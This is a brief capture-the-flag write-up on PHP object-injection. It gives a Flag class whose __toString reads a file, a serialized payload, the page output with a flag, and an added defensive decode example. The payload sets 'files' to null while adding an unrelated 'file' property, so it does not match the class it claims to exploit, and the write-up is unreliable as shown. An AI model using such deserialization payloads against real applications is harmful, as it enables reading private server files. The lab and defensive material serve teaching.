Read the source code and construct the payload:
<?php
class Flag{ //flag.php
    public $files;
    public function __tostring(){
        if(isset($this->files)){
            echo file_get_contents($this->files);
            return ("xixixi");
        }
    }
}
?>
This gives the serialized string to be deserialized: O:4:"Flag":2:{s:5:"files";N;s:4:"file";s:8:"flag.php";}
Get flag
<br><h1>welcome</h1></br>
<br>oh u find it </br>
<!--but i cant give it to u now-->
<?php
if(2===3){
return ("flag{bYpass@3s_w0nderF9l}");
}
?>
xixixi
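
A payload like the one above depends on the target deserializing input with the Flag class available, so that its __toString method can run. As an added example (not part of the original writeup or the challenge source), here is a decode path that refuses serialized objects; safe_decode() and contains_object() are hypothetical helper names, and the second input is constructed.

```php
<?php
// Added example: accept only scalars and arrays from untrusted serialized
// input. safe_decode() and contains_object() are hypothetical helper names.
function safe_decode(string $raw)
{
    // allowed_classes => false maps every object to __PHP_Incomplete_Class,
    // so no application class is instantiated and no magic method can run.
    $data = @unserialize($raw, ['allowed_classes' => false]);
    if ($data === false && $raw !== 'b:0;') {
        throw new InvalidArgumentException('malformed serialized data');
    }
    if (contains_object($data)) {
        throw new InvalidArgumentException('serialized objects are not accepted');
    }
    return $data;
}

function contains_object($value): bool
{
    if ($value instanceof __PHP_Incomplete_Class || is_object($value)) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (contains_object($item)) {
                return true;
            }
        }
    }
    return false;
}

// Inputs: the string from the writeup, then a constructed plain array.
$inputs = [
    'O:4:"Flag":2:{s:5:"files";N;s:4:"file";s:8:"flag.php";}',
    serialize(['page' => 'index', 'id' => 7]),
];
foreach ($inputs as $raw) {
    try {
        $data = safe_decode($raw);
        echo "accepted: ", json_encode($data), "\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: ", $e->getMessage(), "\n";
    }
}
```

Where the data format is under the application's control, json_decode() avoids the object-instantiation path entirely.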